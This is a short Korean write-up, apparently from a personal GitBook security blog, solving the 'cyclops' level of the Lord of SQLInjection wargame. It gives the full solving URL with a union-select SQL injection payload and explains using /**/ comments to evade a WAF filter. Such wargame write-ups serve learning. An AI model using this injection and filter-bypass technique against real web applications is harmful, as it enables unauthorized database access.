이동현 Donghyun Lee

Welcome!
Wargame
CTF
- AlexCTF 2017
  - [Crypto] CR3: What is this encryption?
  - [Crypto] CR4: Poor RSA
- BSides San Francisco CTF 2017
  - [Crypto] []root
project
- How to Find Container Platform Escape Bug
Donghyun's Lifelog

Powered by GitBook

On this page

Was this helpful?

Wargame

Lord of SQLInjection

cyclops

Previousgodzilla Nextchupacabra

Last updated 4 years ago

첫 화면이다.

https://modsec.rubiya.kr/chall/cyclops_9d6a565d1cb6c38a06a6b0815344e29e.php?id=%27%3C@%20union/**/select%20%27first%27,%27second%27%23 에 접속하면 문제가 풀린다.

id에 '<@ union/**/select 'first','second'# 을 넣은 셈이다.

union select 가 필터링 되기 때문에 /**/ 를 사용해 우회하였다.